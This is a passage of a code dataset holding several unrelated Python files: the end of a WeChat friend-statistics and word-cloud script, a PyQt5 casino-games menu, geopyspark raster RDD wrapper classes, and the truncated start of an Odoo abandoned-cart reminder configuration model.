Provinde_count[Provinde_count.index != '']\nprint(Provinde_count)\n\n# 获得城市信息\nCity = df_friends.City\nCity_count = City.value_counts()\nCity_count = City_count[City_count.index != '']\nprint(City_count)\n\n# 画柱状图\ndef plot_bar_sex(x,y):\n # 设置中文字体和负号正常显示\n matplotlib.rcParams['font.sans-serif'] = ['SimHei']\n matplotlib.rcParams['axes.unicode_minus'] = False\n plt.figure()\n # plt.bar(sex_count1.keys(),sex_count1.values())\n plt.bar(x,y)\n plt.savefig(path + '\\\\sexFigure.jpg')\n plt.show()\n\n# 将朋友地理信息写入txt\ndef write_name_all(myNickName, Sex_count2, Provinde_count, City_count):\n file_name_all = myNickName + '_basic_inf.txt'\n write_file = open(path + '\\\\' + file_name_all, 'w')\n write_file.write(\n '你共有%d个好友,其中有%d个男生,%d个女生,%d未显示性别。\\n\\n' % (number_of_friends, Sex_count2[1], Sex_count2[2], Sex_count2[0]) +\n '你的朋友主要来自省份:%s(%d人)、%s(%d人)、%s(%d人)、%s(%d人)和%s(%d人)。\\n\\n' % (\n Provinde_count.index[0], Provinde_count[0], Provinde_count.index[1], Provinde_count[1], Provinde_count.index[2],\n Provinde_count[2], Provinde_count.index[3], Provinde_count[3], Provinde_count.index[4], Provinde_count[4]) +\n '主要来自这些城市:%s(%d人)、%s(%d人)、%s(%d人)、%s(%d人)、%s(%d人)、%s(%d人)、%s(%d人)、%s(%d人)、%s(%d人)和%s(%d人)。' % (\n City_count.index[0], City_count[0], City_count.index[1], City_count[1], City_count.index[2], City_count[2],\n City_count.index[3], City_count[3], City_count.index[4], City_count[4], City_count.index[5], City_count[5],\n City_count.index[6], City_count[6], City_count.index[7], City_count[7], City_count.index[8], City_count[8],\n City_count.index[9], City_count[9]))\n write_file.close()\n\nplot_bar_sex(['男','女','不详'], Sex_count2)\nwrite_name_all(myNickName, Sex_count2, Provinde_count, City_count)\n\n# 获得并处理 微信签名\nSignatures = df_friends.Signature\n# 匹配表情\nregex1 = re.compile('')\n# 匹配两个及以上任意非空字符\nregex2 = re.compile('\\s{2,}')\n# 用一个空格替换表情和多个空格\n# sub(pattern,repl,string)实现将一个字符串中所有符合正则表达式的子串进行替换\nSignatures = [regex2.sub(' ',regex1.sub('',signature,re.S)) for signature in Signatures]\nSignatures = [signature.replace('\\n',' ') for signature in Signatures]\nSignatures = [signature for signature in Signatures if len(signature)>0]\n\nprint(Signatures)\ntext_Signatures = ''.join(Signatures)\nprint(' ---------- ')\nprint(text_Signatures)\nfile_signatures = myNickName + '_wechat_signatures.txt'\nfile_signatures = path + '\\\\' + file_signatures\nwith open(file_signatures, 'w', encoding='utf-8') as f:\n f.write(text_Signatures)\n f.close()\n\nsigt_word_list = jieba.cut(text_Signatures,cut_all=True)\nword_space_split = '/'.join(sigt_word_list)\nprint(' ------ ')\nprint(word_space_split)\n\n# coloring = np.array(Image.open(path + '\\\\' + 'background.jpg'))\n#生成词云。font_path=\"C:\\Windows\\Fonts\\msyhl.ttc\"指定字体,有些字e不能解析中文,这种情况下会出现乱码。\nmy_wordcloud = WordCloud(background_color=\"white\", max_words=2000, max_font_size=60, random_state=42, scale=2,\n font_path=\"E:/GitCode/useAndLearnCode/spideruse/wechat/Figo/HYZhengYuan-75W-2.otf\").generate(word_space_split)\n\nfile_name_p = myNickName + '_word.jpg'\nfile_name_p = path + '\\\\' + file_name_p\n#保存图片\nmy_wordcloud.to_file(file_name_p)","sub_path":"spideruse/wechat/wechatTutorial.py","file_name":"wechatTutorial.py","file_ext":"py","file_size_in_byte":5042,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"487388631","text":"import sys,re\nfrom PyQt5 import uic, QtWidgets, QtGui\n\nfrom PyQt5.QtWidgets import QMessageBox\nfrom PIL import Image\nqtCreatorFile = \"./Interfaz_Principal/Main.ui\" # Nombre del archivo aquí.\nplotImg = './Interfaz_Principal/Captura.jpg'\nUi_MainWindow, QtBaseClass = uic.loadUiType(qtCreatorFile)\nfrom Juego1 import Ruleta\nfrom Juego2 import Altos_o_Bajos_Codificacionado\nfrom Juego3 import LootBoxGame\nfrom Juego4 import SuperTragaPerras\nfrom Juego5 import CapsUI\nfrom Juego6 import casino\nfrom Juego7 import keno\nfrom Juego8 import Jackpot\nfrom Recarga import menu\n\nimport bd\nfrom PyQt5.QtChart import QChart, QChartView, QLineSeries\nfrom PyQt5.QtCore import QPointF\nfrom PyQt5.QtGui import QPainter\nfrom PyQt5.QtCore import Qt,QThread, pyqtSignal\nfrom PyQt5 import QtCore, QtGui, QtWidgets\nclass MainW(QtWidgets.QMainWindow, Ui_MainWindow):\n def __init__(self):\n QtWidgets.QMainWindow.__init__(self)\n Ui_MainWindow.__init__(self)\n self.setupUi(self)\n self.showMaximized()\n \n self.imagen.setText(\"aaaaaaa\")\n myimg = QtGui.QPixmap(plotImg)\n self.imagen.setPixmap(myimg)\n self.Juego1.clicked.connect(self.runjuego1)\n self.Juego2.clicked.connect(self.runjuego2)\n self.Juego3.clicked.connect(self.runjuego3)\n self.Juego4.clicked.connect(self.runjuego4)\n self.Juego5.clicked.connect(self.runjuego5)\n self.Juego6.clicked.connect(self.runjuego6)\n self.Juego7.clicked.connect(self.runjuego7)\n self.Juego8.clicked.connect(self.runjuego8)\n self.setupgraph()\n self.updatechart()\n self._actualizar.clicked.connect(self.updatechart)\n\n self._recargar.clicked.connect(self.recargar)\n def runjuego1(self):\n self.window = Ruleta.UIWindow()\n self.window.show()\n def runjuego2(self):\n self.window = Altos_o_Bajos_Codificacionado.MainWindow()\n self.window.show()\n def runjuego3(self):\n self.window = LootBoxGame.MyApp()\n self.window.show()\n def runjuego4(self):\n self.window = SuperTragaPerras.UIWindow()\n self.window.show()\n def runjuego5(self):\n self.window = CapsUI.UIWindow()\n self.window.show()\n def runjuego6(self):\n self.window = casino.MyApp()\n self.window.show()\n def runjuego7(self):\n self.window = keno.UIWindow()\n self.window.show()\n def runjuego8(self):\n self.window = Jackpot.UIWindow()\n self.window.show()\n def recargar(self):\n self.window = menu.MyApp()\n self.window.show()\n\n\n def setupgraph(self):\n self.chart = QChart()\n self.chart.createDefaultAxes()\n self.chart.setAnimationOptions(QChart.SeriesAnimations)\n self.chart.setTitle(\"Saldo vs Tiempo\")\n self.chart.legend().setVisible(True)\n self.chart.legend().setAlignment(Qt.AlignBottom)\n self.chartview = QChartView(self.chart)\n self.chartview.setRenderHint(QPainter.Antialiasing)\n self._graphlayout.addWidget(self.chartview)\n def updatechart(self):\n self.series = QLineSeries(self)\n self.datos = bd.getData()\n self.c = 0\n for x in self.datos:\n self.series.append(self.c,x)\n self.c+=1\n self.chart.removeAllSeries()\n self.chart.addSeries(self.series)\n self.chart.createDefaultAxes()\n\n def create_linechart(self):\n\n self.series = QLineSeries(self)\n self.datos = bd.getData()\n self.c = 0\n for x in self.datos:\n self.series.append(self.c,x)\n self.c+=1\n self.chart = QChart()\n self.chart.addSeries(self.series)\n self.chart.createDefaultAxes()\n self.chart.setAnimationOptions(QChart.SeriesAnimations)\n self.chart.setTitle(\"Saldo vs Tiempo\")\n self.chart.legend().setVisible(True)\n self.chart.legend().setAlignment(Qt.AlignBottom)\n self.chartview = QChartView(self.chart)\n self.chartview.setRenderHint(QPainter.Antialiasing)\n self._graphlayout.addWidget(self.chartview)\nif __name__ == \"__main__\":\n app = QtWidgets.QApplication(sys.argv)\n window = MainW()\n window.show()\n sys.exit(app.exec_())","sub_path":"Codigo/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4207,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"631839050","text":"'''\nThis module contains the RasterRDD and the TiledRasterRDD classes. Both of these classes are\nwrappers of their scala counterparts. These will be used in leau of actual PySpark RDDs when\nperforming operations.\n'''\nimport json\nimport shapely.wkt\n\nfrom shapely.geometry import Polygon\nfrom shapely.wkt import dumps\nfrom geopyspark.geotrellis.constants import (RESAMPLE_METHODS,\n OPERATIONS,\n NEIGHBORHOODS,\n NEARESTNEIGHBOR,\n FLOAT,\n TILE,\n SPATIAL,\n LESSTHANOREQUALTO\n )\n\ndef _reclassify(srdd, value_map, data_type, boundary_strategy):\n new_dict = {}\n\n for key, value in value_map.items():\n if not isinstance(key, data_type):\n val = value_map[key]\n for k in key:\n new_dict[k] = val\n else:\n new_dict[key] = value\n\n if data_type is int:\n return srdd.reclassify(new_dict, boundary_strategy)\n else:\n return srdd.reclassifyDouble(new_dict, boundary_strategy)\n\n\nclass RasterRDD(object):\n \"\"\"A RDD that contains GeoTrellis rasters.\n\n Represents a RDD that contains (K, V). Where K is either ProjectedExtent or\n TemporalProjectedExtent depending on the `rdd_type` of the RDD, and V being a raster.\n\n Args:\n geopysc (GeoPyContext): The GeoPyContext being used this session.\n rdd_type (str): What the spatial type of the geotiffs are. This is\n represented by the constants: `SPATIAL` and `SPACETIME`.\n srdd (JavaObject): The coresponding scala class. This is what allows RasterRDD to access\n the various scala methods.\n\n Attributes:\n geopysc (GeoPyContext): The GeoPyContext being used this session.\n rdd_type (str): What the spatial type of the geotiffs are. This is\n represented by the constants: `SPATIAL` and `SPACETIME`.\n srdd (JavaObject): The coresponding scala class. This is what allows RasterRDD to access\n the various scala methods.\n \"\"\"\n\n __slots__ = ['geopysc', 'rdd_type', 'srdd']\n\n def __init__(self, geopysc, rdd_type, srdd):\n self.geopysc = geopysc\n self.rdd_type = rdd_type\n self.srdd = srdd\n\n @classmethod\n def from_numpy_rdd(cls, geopysc, rdd_type, numpy_rdd):\n \"\"\"Create a RasterRDD from a numpy RDD.\n\n Args:\n geopysc (GeoPyContext): The GeoPyContext being used this session.\n rdd_type (str): What the spatial type of the geotiffs are. This is\n represented by the constants: `SPATIAL` and `SPACETIME`.\n numpy_rdd (RDD): A PySpark RDD that contains tuples of either ProjectedExtents or\n TemporalProjectedExtents and raster that is represented by a numpy array.\n\n Returns:\n :class:`~geopyspark.geotrellis.rdd.RasterRDD`\n \"\"\"\n\n key = geopysc.map_key_input(rdd_type, False)\n\n schema = geopysc.create_schema(key)\n ser = geopysc.create_tuple_serializer(schema, key_type=None, value_type=TILE)\n reserialized_rdd = numpy_rdd._reserialize(ser)\n\n if rdd_type == SPATIAL:\n srdd = \\\n geopysc._jvm.geopyspark.geotrellis.ProjectedRasterRDD.fromAvroEncodedRDD(\n reserialized_rdd._jrdd, schema)\n else:\n srdd = \\\n geopysc._jvm.geopyspark.geotrellis.TemporalRasterRDD.fromAvroEncodedRDD(\n reserialized_rdd._jrdd, schema)\n\n return cls(geopysc, rdd_type, srdd)\n\n def to_numpy_rdd(self):\n \"\"\"Converts a RasterRDD to a numpy RDD.\n\n Note:\n Depending on the size of the data stored within the RDD, this can be an exspensive\n operation and should be used with caution.\n\n Returns:\n RDD\n \"\"\"\n\n result = self.srdd.toAvroRDD()\n ser = self.geopysc.create_tuple_serializer(result._2(), value_type=TILE)\n return self.geopysc.create_python_rdd(result._1(), ser)\n\n def collect_metadata(self, extent=None, layout=None, crs=None, tile_size=256):\n \"\"\"Iterate over RDD records and generates layer metadata desribing the contained rasters.\n\n Args:\n extent (:ref:`extent`, optional): Specify layout extent, must also specify layout.\n layout (:ref:`tile_layout`, optional): Specify tile layout, must also specify extent.\n crs (str, int, optional): Ignore CRS from records and use given one instead.\n tile_size (int, optional): Pixel dimensions of each tile, if not using layout.\n\n Note:\n `extent` and `layout` must both be defined if they are to be used.\n\n Returns:\n :ref:`metadata`\n\n Raises:\n TypeError: If either `extent` and `layout` is not defined but the other is.\n \"\"\"\n\n if not crs:\n crs = \"\"\n\n if extent and layout:\n json_metadata = self.srdd.collectMetadata(extent, layout, crs)\n elif not extent and not layout:\n json_metadata = self.srdd.collectMetadata(str(tile_size), crs)\n else:\n raise TypeError(\"Could not collect metadata with {} and {}\".format(extent, layout))\n\n return json.loads(json_metadata)\n\n def reproject(self, target_crs, resample_method=NEARESTNEIGHBOR):\n \"\"\"Reproject every individual raster to `target_crs`, does not sample past tile boundary\n\n Args:\n target_crs (int, str): The CRS to reproject to. Can either be the EPSG code,\n well-known name, or a PROJ.4 projection string.\n resample_method (str, optional): The resample method to use for the reprojection.\n This is represented by a constant. If none is specified, then `NEARESTNEIGHBOR`\n is used.\n\n Returns:\n :class:`~geopyspark.geotrellis.rdd.RasterRDD`\n \"\"\"\n\n if resample_method not in RESAMPLE_METHODS:\n raise ValueError(resample_method, \" Is not a known resample method.\")\n\n return RasterRDD(self.geopysc, self.rdd_type,\n self.srdd.reproject(target_crs, resample_method))\n\n def cut_tiles(self, layer_metadata, resample_method=NEARESTNEIGHBOR):\n \"\"\"Cut tiles to layout. May result in duplicate keys.\n\n Args:\n layer_metadata (:ref:`metadata`): The metadata of the ``RasterRDD`` instance.\n resample_method (str, optional): The resample method to use for the reprojection.\n This is represented by a constant. If none is specified, then `NEARESTNEIGHBOR`\n is used.\n\n Returns:\n :class:`~geopyspark.geotrellis.rdd.TiledRasterRDD`\n \"\"\"\n\n if resample_method not in RESAMPLE_METHODS:\n raise ValueError(resample_method, \" Is not a known resample method.\")\n\n srdd = self.srdd.cutTiles(json.dumps(layer_metadata), resample_method)\n return TiledRasterRDD(self.geopysc, self.rdd_type, srdd)\n\n def tile_to_layout(self, layer_metadata, resample_method=NEARESTNEIGHBOR):\n \"\"\"Cut tiles to layout and merge overlapping tiles. This will produce unique keys.\n\n Args:\n layer_metadata (:ref:`metadata`): The metadata of the ``RasterRDD`` instance.\n resample_method (str, optional): The resample method to use for the reprojection.\n This is represented by a constant. If none is specified, then `NEARESTNEIGHBOR`\n is used.\n\n Returns:\n :class:`~geopyspark.geotrellis.rdd.TiledRasterRDD`\n \"\"\"\n\n if resample_method not in RESAMPLE_METHODS:\n raise ValueError(resample_method, \" Is not a known resample method.\")\n\n srdd = self.srdd.tileToLayout(json.dumps(layer_metadata), resample_method)\n return TiledRasterRDD(self.geopysc, self.rdd_type, srdd)\n\n def reclassify(self, value_map, data_type, boundary_strategy=LESSTHANOREQUALTO):\n \"\"\"Changes the cell values of a raster based on how the data is broken up.\n\n Args:\n value_map (dict): A ``dict`` whose keys represent values where a break should occur and\n its values are the new value the cells within the break should become.\n data_type (type): The type of the values within the rasters. Can either be ``int`` or\n ``float``.\n boundary_strategy (str, optional): How the cells should be classified along the breaks.\n If unspecified, then ``LESSTHANOREQUALTO`` will be used.\n\n NOTE:\n Simbolizing a NoData value differs depending on if the ``data_type`` is an ``int`` or a\n ``float``. For an ``int``, the constant ``NODATAINT`` can be used which represents the\n NoData value for ``int`` in GeoTrellis. If ``float``, then ``float('nan')`` is used to\n represent NoData.\n\n Returns:\n :class:`~geopyspark.geotrellis.rdd.RasterRDD`\n \"\"\"\n\n srdd = _reclassify(self.srdd, value_map, data_type, boundary_strategy)\n return RasterRDD(self.geopysc, self.rdd_type, srdd)\n\n\nclass TiledRasterRDD(object):\n \"\"\"Holds a RDD of GeoTrellis rasters.\n\n Represents a RDD that contains (K, V). Where K is either SpatialKey or SpaceTimeKey depending\n on the `rdd_type` of the RDD, and V being a raster.\n\n Args:\n geopysc (GeoPyContext): The GeoPyContext being used this session.\n rdd_type (str): What the spatial type of the geotiffs are. This is\n represented by the constants: `SPATIAL` and `SPACETIME`.\n srdd (JavaObject): The coresponding scala class. This is what allows RasterRDD to access\n the various scala methods.\n\n Attributes:\n geopysc (GeoPyContext): The GeoPyContext being used this session.\n rdd_type (str): What the spatial type of the geotiffs are. This is\n represented by the constants: `SPATIAL` and `SPACETIME`.\n srdd (JavaObject): The coresponding scala class. This is what allows RasterRDD to access\n the various scala methods.\n \"\"\"\n\n __slots__ = ['geopysc', 'rdd_type', 'srdd']\n\n def __init__(self, geopysc, rdd_type, srdd):\n self.geopysc = geopysc\n self.rdd_type = rdd_type\n self.srdd = srdd\n\n @property\n def layer_metadata(self):\n \"\"\"Layer metadata associated with this layer.\"\"\"\n return json.loads(self.srdd.layerMetadata())\n\n @property\n def zoom_level(self):\n \"\"\"The zoom level of the RDD. Can be `None`.\"\"\"\n return self.srdd.getZoom()\n\n @classmethod\n def from_numpy_rdd(cls, geopysc, rdd_type, numpy_rdd, metadata):\n \"\"\"Create a TiledRasterRDD from a numpy RDD.\n\n Args:\n geopysc (GeoPyContext): The GeoPyContext being used this session.\n rdd_type (str): What the spatial type of the geotiffs are. This is\n represented by the constants: `SPATIAL` and `SPACETIME`.\n numpy_rdd (RDD): A PySpark RDD that contains tuples of either ProjectedExtents or\n TemporalProjectedExtents and raster that is represented by a numpy array.\n metadata (:ref:`metadata`): The metadata of the ``TiledRasterRDD`` instance.\n\n Returns:\n :class:`~geopyspark.geotrellis.rdd.TiledRasterRDD`\n \"\"\"\n key = geopysc.map_key_input(rdd_type, True)\n\n schema = geopysc.create_schema(key)\n ser = geopysc.create_tuple_serializer(schema, key_type=None, value_type=TILE)\n reserialized_rdd = numpy_rdd._reserialize(ser)\n\n if rdd_type == SPATIAL:\n srdd = \\\n geopysc._jvm.geopyspark.geotrellis.SpatialTiledRasterRDD.fromAvroEncodedRDD(\n reserialized_rdd._jrdd, schema, json.dumps(metadata))\n else:\n srdd = \\\n geopysc._jvm.geopyspark.geotrellis.TemporalTiledRasterRDD.fromAvroEncodedRDD(\n reserialized_rdd._jrdd, schema, json.dumps(metadata))\n\n return cls(geopysc, rdd_type, srdd)\n\n @classmethod\n def rasterize(cls, geopysc, rdd_type, geometry, extent, crs, cols, rows,\n fill_value, instant=None):\n \"\"\"Creates a TiledRasterRDD from a shapely geomety.\n\n Args:\n geopysc (GeoPyContext): The GeoPyContext being used this session.\n rdd_type (str): What the spatial type of the geotiffs are. This is\n represented by the constants: `SPATIAL` and `SPACETIME`.\n geometry (str, Polygon): The value to be turned into a raster. Can either be a\n string or a ``Polygon``. If the value is a string, it must be the WKT string,\n geometry format.\n extent (:ref:`extent`): The ``extent`` of the new raster.\n crs (str): The CRS the new raster should be in.\n cols (int): The number of cols the new raster should have.\n rows (int): The number of rows the new raster should have.\n fill_value (int): The value to fill the raster with.\n\n Note:\n Only the area the raster intersects with the ``extent`` will have this value.\n Any other area will be filled with GeoTrellis' NoData value for ``int`` which\n is represented in GeoPySpark as the constant, ``NODATAINT``.\n instant(int, optional): Optional if the data has no time component (ie is ``SPATIAL``).\n Otherwise, it is requires and represents the time stamp of the data.\n\n Returns:\n :class:`~geopyspark.geotrellis.rdd.TiledRasterRDD`\n\n Raises:\n TypeError: If ``geometry`` is not a ``str`` or a ``Polygon``; or if there was a\n mistach in inputs. Mainly, setting the ``rdd_type`` as ``SPATIAL`` but also setting\n ``instant``.\n \"\"\"\n\n if not isinstance(geometry, str):\n try:\n geometry = dumps(geometry)\n except:\n raise TypeError(geometry, \"Needs to be either a Shapely Geometry or a string\")\n\n if instant and rdd_type != SPATIAL:\n srdd = geopysc._jvm.geopyspark.geotrellis.TemporalTiledRasterRDD.rasterize(\n geopysc.sc, geometry, extent, crs, instant, cols, rows, fill_value)\n elif not instant and rdd_type == SPATIAL:\n srdd = geopysc._jvm.geopyspark.geotrellis.SpatialTiledRasterRDD.rasterize(\n geopysc.sc, geometry, extent, crs, cols, rows, fill_value)\n else:\n raise TypeError(\"Abiguous inputs. Given \", instant, \" but rdd_type is SPATIAL\")\n\n return cls(geopysc, rdd_type, srdd)\n\n def to_numpy_rdd(self):\n \"\"\"Converts a TiledRasterRDD to a numpy RDD.\n\n Note:\n Depending on the size of the data stored within the RDD, this can be an exspensive\n operation and should be used with caution.\n\n Returns:\n RDD\n \"\"\"\n result = self.srdd.toAvroRDD()\n ser = self.geopysc.create_tuple_serializer(result._2(), value_type=TILE)\n return self.geopysc.create_python_rdd(result._1(), ser)\n\n def reproject(self, target_crs, extent=None, layout=None, scheme=FLOAT, tile_size=256,\n resolution_threshold=0.1, resample_method=NEARESTNEIGHBOR):\n \"\"\"Reproject RDD as tiled raster layer, samples surrounding tiles.\n\n Args:\n target_crs (int, str): The CRS to reproject to. Can either be the EPSG code,\n well-known name, or a PROJ.4 projection string.\n extent (:ref:`extent`, optional): Specify layout extent, must also specify layout.\n layout (:ref:`tile_layout`, optional): Specify tile layout, must also specify extent.\n scheme (str, optional): Which LayoutScheme should be used. Represented by the\n constants: `FLOAT` and `ZOOM`. If not specified, then `FLOAT` is used.\n tile_size (int, optional): Pixel dimensions of each tile, if not using layout.\n resolution_threshold (double, optional): The percent difference between a cell size\n and a zoom level along with the resolution difference between the zoom level and\n the next one that is tolerated to snap to the lower-resolution zoom.\n resample_method (str, optional): The resample method to use for the reprojection.\n This is represented by a constant. If none is specified, then NEARESTNEIGHBOR\n is used.\n\n Note:\n `extent` and `layout` must both be defined if they are to be used.\n\n Returns:\n :class:`~geopyspark.geotrellis.rdd.TiledRasterRDD`\n\n Raises:\n TypeError if either `extent` or `layout` is defined bu the other is not.\n \"\"\"\n\n if resample_method not in RESAMPLE_METHODS:\n raise ValueError(resample_method, \" Is not a known resample method.\")\n\n if extent and layout:\n srdd = self.srdd.reproject(extent, layout, target_crs, resample_method)\n elif not extent and not layout:\n srdd = self.srdd.reproject(scheme, tile_size, resolution_threshold,\n target_crs, resample_method)\n else:\n raise TypeError(\"Could not collect reproject RDD with {} and {}\".format(extent, layout))\n\n return TiledRasterRDD(self.geopysc, self.rdd_type, srdd)\n\n def tile_to_layout(self, layout, resample_method=NEARESTNEIGHBOR):\n \"\"\"Cut tiles to layout and merge overlapping tiles. This will produce unique keys.\n\n Args:\n layout (:ref:`tile_layout`): Specify the TileLayout to cut to.\n resample_method (str, optional): The resample method to use for the reprojection.\n This is represented by a constant. If none is specified, then NEARESTNEIGHBOR\n is used.\n\n Returns:\n :class:`~geopyspark.geotrellis.rdd.TiledRasterRDD`\n \"\"\"\n\n if resample_method not in RESAMPLE_METHODS:\n raise ValueError(resample_method, \" Is not a known resample method.\")\n\n srdd = self.srdd.tileToLayout(layout, resample_method)\n\n return TiledRasterRDD(self.geopysc, self.rdd_type, srdd)\n\n def pyramid(self, start_zoom, end_zoom, resample_method=NEARESTNEIGHBOR):\n \"\"\"Creates a pyramid of GeoTrellis layers where each layer reprsents a given zoom.\n\n Args:\n start_zoom (int): The zoom level where pyramiding should begin. Represents\n the level that is most zoomed in.\n end_zoom (int): The zoom level where pyramiding should end. Represents\n the level that is most zoomed out.\n resample_method (str, optional): The resample method to use for the reprojection.\n This is represented by a constant. If none is specified, then NEARESTNEIGHBOR\n is used.\n\n Returns:\n Pyramided TiledRasterRDDs (list): A list of TiledRasterRDDs.\n \"\"\"\n\n if resample_method not in RESAMPLE_METHODS:\n raise ValueError(resample_method, \" Is not a known resample method.\")\n\n size = self.layer_metadata['layoutDefinition']['tileLayout']['tileRows']\n\n if (size & (size - 1)) != 0:\n raise ValueError(\"Tiles must have a col and row count that is a power of 2\")\n\n result = self.srdd.pyramid(start_zoom, end_zoom, resample_method)\n\n return [TiledRasterRDD(self.geopysc, self.rdd_type, srdd) for srdd in result]\n\n def focal(self, operation, neighborhood, param_1=None, param_2=None, param_3=None):\n \"\"\"Performs the given focal operation on the layers contained in the RDD.\n\n Args:\n operation (str): The focal operation such as SUM, ASPECT, SLOPE, etc.\n neighborhood (str): The type of neighborhood to use such as ANNULUS, SQUARE, etc.\n param_1 (int, optional): If using SLOPE, then this is the zFactor, else it is the first\n argument of the `neighborhood`.\n param_2 (int, optional): The second argument of the `neighborhood`.\n param_3 (int, optional): The third argument of the `neighborhood`.\n\n Note:\n Any `param` that is not set will default to 0.0.\n\n Returns:\n :class:`~geopyspark.geotrellis.rdd.TiledRasterRDD`\n \"\"\"\n\n if operation not in OPERATIONS:\n raise ValueError(operation, \" Is not a known operation.\")\n\n if param_1 is None:\n param_1 = 0.0\n if param_2 is None:\n param_2 = 0.0\n if param_3 is None:\n param_3 = 0.0\n\n srdd = self.srdd.focal(operation, neighborhood, param_1, param_2, param_3)\n\n return TiledRasterRDD(self.geopysc, self.rdd_type, srdd)\n\n def stitch(self):\n \"\"\"Stitch all of the rasters within the RDD into one raster.\n\n Note:\n This can only be used on `SPATIAL` TiledRasterRDDs.\n\n Returns:\n :ref:`raster`\n \"\"\"\n\n if self.rdd_type != SPATIAL:\n raise ValueError(\"Only TiledRasterRDDs with a rdd_type of Spatial can use stitch()\")\n\n tup = self.srdd.stitch()\n ser = self.geopysc.create_value_serializer(tup._2(), TILE)\n return ser.loads(tup._1())[0]\n\n def cost_distance(self, geometries, max_distance):\n \"\"\"Performs cost distance of a TileLayer.\n\n Args:\n geometries (list): A list of shapely geometries to be used as a starting point.\n\n Note:\n All geometries must be in the same CRS as the TileLayer.\n max_distance (int): The maximum ocst that a path may reach before operation.\n\n Returns:\n :class:`~geopyspark.geotrellis.rdd.TiledRasterRDD`\n \"\"\"\n\n wkts = [shapely.wkt.dumps(g) for g in geometries]\n srdd = self.srdd.costDistance(self.geopysc.sc, wkts, max_distance)\n\n return TiledRasterRDD(self.geopysc, self.rdd_type, srdd)\n\n def reclassify(self, value_map, data_type, boundary_strategy=LESSTHANOREQUALTO):\n \"\"\"Changes the cell values of a raster based on how the data is broken up.\n\n Args:\n value_map (dict): A ``dict`` whose keys represent values where a break should occur and\n its values are the new value the cells within the break should become.\n data_type (type): The type of the values within the rasters. Can either be ``int`` or\n ``float``.\n boundary_strategy (str, optional): How the cells should be classified along the breaks.\n If unspecified, then ``LESSTHANOREQUALTO`` will be used.\n\n NOTE:\n Simbolizing a NoData value differs depending on if the ``data_type`` is an ``int`` or a\n ``float``. For an ``int``, the constant ``NODATAINT`` can be used which represents the\n NoData value for ``int`` in GeoTrellis. If ``float``, then ``float('nan')`` is used to\n represent NoData.\n\n Returns:\n :class:`~geopyspark.geotrellis.rdd.TiledRasterRDD`\n \"\"\"\n\n srdd = _reclassify(self.srdd, value_map, data_type, boundary_strategy)\n return TiledRasterRDD(self.geopysc, self.rdd_type, srdd)\n\n def _process_operation(self, value, operation):\n if isinstance(value, int) or isinstance(value, float):\n srdd = operation(value)\n elif isinstance(value, TiledRasterRDD):\n if self.rdd_type != value.rdd_type:\n raise ValueError(\"Both TiledRasterRDDs need to have the same rdd_type\")\n\n if self.layer_metadata['layoutDefinition']['tileLayout'] != \\\n value.layer_metadata['layoutDefinition']['tileLayout']:\n raise ValueError(\"Both TiledRasterRDDs need to have the same layout\")\n\n srdd = operation(value.srdd)\n else:\n raise TypeError(\"Local operation cannot be performed with\", value)\n\n return TiledRasterRDD(self.geopysc, self.rdd_type, srdd)\n\n def __add__(self, value):\n return self._process_operation(value, self.srdd.localAdd)\n\n def __radd__(self, value):\n return self._process_operation(value, self.srdd.localAdd)\n\n def __sub__(self, value):\n return self._process_operation(value, self.srdd.localSubtract)\n\n def __rsub__(self, value):\n return self._process_operation(value, self.srdd.reverseLocalSubtract)\n\n def __mul__(self, value):\n return self._process_operation(value, self.srdd.localMultiply)\n\n def __rmul__(self, value):\n return self._process_operation(value, self.srdd.localMultiply)\n\n def __truediv__(self, value):\n return self._process_operation(value, self.srdd.localDivide)\n\n def __rtruediv__(self, value):\n return self._process_operation(value, self.srdd.reverseLocalDivide)\n","sub_path":"geopyspark/geotrellis/rdd.py","file_name":"rdd.py","file_ext":"py","file_size_in_byte":25041,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"475471822","text":"from odoo import api, fields, models, _\nfrom datetime import datetime\nfrom dateutil.relativedelta import relativedelta\n\nclass res_config_settings(models.TransientModel):\n _inherit = 'res.config.settings'\n\n\n allow_abandoneded_recovery = fields.Boolean(string=\"Allow Abandoned Recovery Mail\",related='website_id.allow_abandoneded_recovery')\n # group_abandonded_mail_reminder = fields.Boolean(\"Manage Group Acivation\",\n # implied_group='abandoned_cart_reminder_ept.group_abandonded_mail_reminder')\n reminder_update_policy = fields.Selection([\n ('global_update', 'All Schedule Update'),\n ('single_update', 'Individual schedule update'),\n ], string='Reminder Schedule Update Policy',default='global_update',related='website_id.reminder_update_policy',\n help=\"Select one policy for update reminder schedule. Here, 'All Schedule Update' for Global Updation. Which update all records of Abandoned Recovery Mail based on Mail Reminder Configuration.\"\n \"And 'Individual Schedule Update' is updated based on that selected particular mail reminder and you can see this update button in Mail Reminder Schedule.\")\n\n\n\n # # This method is used to implement Group on Menus\n # @api.onchange('allow_abandoneded_recovery')\n # def _onchange_allow_abandoneded_recovery_reminder(self):\n # if self.allow_abandoneded_recovery == True:\n # self.group_abandonded_mail_reminder = True\n # else:\n # self.group_abandonded_mail_reminder = False\n\n def update_records_abanodend_mail(self):\n if self.reminder_update_policy == 'global_update':\n websites = self.env['website'].search([('allow_abandoneded_recovery','=',True)])\n abd_records = self.env['abandoned.recovery.mail'].sudo().search([\n ('is_email_sent', '=', False), ('cancel', '=', False)])\n if abd_records:\n abd_records.unlink()\n\n RecoveryMail = self.env['abandoned.recovery.mail']\n curr_time = datetime.today().strftime('%Y-%m-%d %H:%M:%S')\n if websites:\n for website in websites:\n MailReminder = self.env['mail.reminder'].sudo().search(\n [('is_active', '=', True), ('website_id', '=', website.id)])\n\n if MailReminder:\n orders = self.env['sale.order'].sudo().search([('state', '=', 'draft'),\n ('partner_id.id', '!=', self.env.ref('base.public_partner').id),\n ('team_id.team_type', '=', 'website'),('order_line', '!=', False),\n ('website_id','=',website.id)])\n\n if orders:\n for order in orders:\n for reminder in MailReminder:\n schedule_hour = reminder.hours\n schedule_time = fields.Datetime.to_string(order.date_order + relativedelta(hours=schedule_hour))\n\n\n if schedule_time > curr_time:\n vals = {\n 'order_id': order.id,\n 'website_id': website.id,\n 'reminder_id': reminder.id,\n 'is_email_sent': False,\n 'schedule_time': schedule_time,\n 'is_active': True\n }\n 